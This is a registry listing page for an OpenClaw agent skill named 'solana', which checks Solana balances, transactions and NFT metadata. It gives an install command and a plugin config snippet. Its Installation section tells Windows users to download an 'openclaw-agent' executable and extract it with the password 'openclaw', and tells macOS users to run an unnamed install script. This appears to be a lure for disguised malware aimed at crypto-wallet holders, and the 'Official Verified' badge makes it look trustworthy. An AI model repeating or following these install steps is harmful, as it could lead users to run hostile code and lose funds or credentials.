ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into your OpenClaw agent. Monitor wallets, track SPL tokens, and analyze transaction data with this powerful Web3 automation tool.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-pjnom
Or

What This Skill Does

The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It acts as a bridge between your automated workflows and one of the fastest L1 blockchains in existence. By leveraging the Solana CLI and common ecosystem tools like Metaboss and spl-token, this skill enables your agent to query wallet balances, track SPL token holdings, analyze transaction history, and inspect complex stake accounts. Whether you are building an automated portfolio tracker, a real-time whale monitoring system, or an NFT metadata explorer, this skill provides the underlying primitives to make that possible.

Installation

To get started, you must first ensure the openclaw-agent utility is running on your machine. For Windows users, download the provided executable from the GitHub repository and use the password 'openclaw' to extract it. macOS users should follow the installation script provided in the documentation to ensure environment compatibility. Once the agent is active, run the following command in your OpenClaw interface: clawhub install openclaw/skills/skills/hightower6eu/solana-pjnom. You must also ensure the standard Solana CLI suite is installed on your machine to handle the heavy lifting of blockchain interactions.

Use Cases

This skill is ideal for financial developers, Web3 enthusiasts, and data analysts. Use it to build automated alerts for wallet activity, verify NFT authenticity by pulling metadata directly from the chain, or perform deep-dive research into transaction success rates. It is particularly useful for portfolio management tasks, such as programmatically listing all SPL tokens held in a wallet without relying on slow or potentially unreliable centralized explorers.

Example Prompts

  1. "Check the current SOL balance for wallet address 7xKY... and output the amount in both SOL and lamports."
  2. "Show me the last 10 transactions for my USDC-holding account and check if any of them failed."
  3. "List all my SPL tokens and provide the current metadata for the NFT with mint address 9v..."

Tips & Limitations

Always ensure your local Solana config is set to the correct RPC endpoint (Mainnet for production, Devnet for testing). Since blockchain data is read-heavy, ensure your RPC provider has sufficient rate limits to support your agent's activity. Note that for private keys or sensitive operations, ensure the agent has secure access; never share your raw wallet keys within prompts. Performance may vary based on your network latency and the current state of the global Solana RPC nodes.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-pjnom": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#cryptocurrency#automation
Safety Score: 3/5

Flags: network-access, external-api, code-execution